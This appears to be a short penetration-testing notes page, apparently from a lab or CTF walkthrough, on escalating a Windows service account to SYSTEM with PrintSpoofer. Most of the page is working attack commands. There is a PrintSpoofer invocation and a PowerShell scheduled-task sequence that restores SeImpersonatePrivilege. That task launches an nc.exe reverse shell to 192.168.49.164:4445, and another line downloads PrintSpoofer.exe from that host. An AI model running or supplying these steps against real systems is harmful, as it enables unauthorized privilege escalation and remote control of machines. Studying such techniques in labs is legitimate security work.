Printspoofer PE(instantly become System!)

  • PrintSpoofer exploit that can be used to escalate service user permissions on Windows Server 2016, Server 2019, and Windows 10.

    To escalate privileges, the service account must have SeImpersonate privileges.

Steps: 1. Transfer the exe to the victim, and run the command 

PrintSpoofer.exe -i -c cmd

Now we've got a rev shell with more privileges

Reading through the privileges we have now, it's confirmed that the SeImpersonatePrivilege is missing but that can be retrieved by creating a ScheduledTaskPrincipal where we can specify SeImpersonatePrivilege in RequiredPrivilege attribute.

# Create a list of privileges
PS C:\Windows\system32> [System.String[]]$Privs = "SeAssignPrimaryTokenPrivilege", "SeAuditPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeImpersonatePrivilege", "SeIncreaseWorkingSetPrivilege"

# Create a Principal for the task 
PS C:\Windows\system32> $TaskPrincipal = New-ScheduledTaskPrincipal -UserId "LOCALSERVICE" -LogonType ServiceAccount -RequiredPrivilege $Privs

# Create an action for the task 
PS C:\Windows\system32> $TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `"C:\wamp\www\nc.exe 192.168.49.164 4445 -e cmd.exe`""

# Create the task
PS C:\Windows\system32> Register-ScheduledTask -Action $TaskAction -TaskName "GrantAllPerms" -Principal $TaskPrincipal

TaskPath                                       TaskName                          State     
--------                                       --------                          -----     
\                                              GrantAllPerms                     Ready     

# Start the task
PS C:\Windows\system32> Start-ScheduledTask -TaskName "GrantAllPerms"

SeImpersonatePrivilege is on now! Let's get into the system with printspoofer!

powershell (New-Object Net.WebClient).DownloadFile("http://192.168.49.164:8080/PrintSpoofer.exe","C:\wamp\www\prints.exe")

rooted!

Previouslocalservice Priv EscNextPage 1

Last updated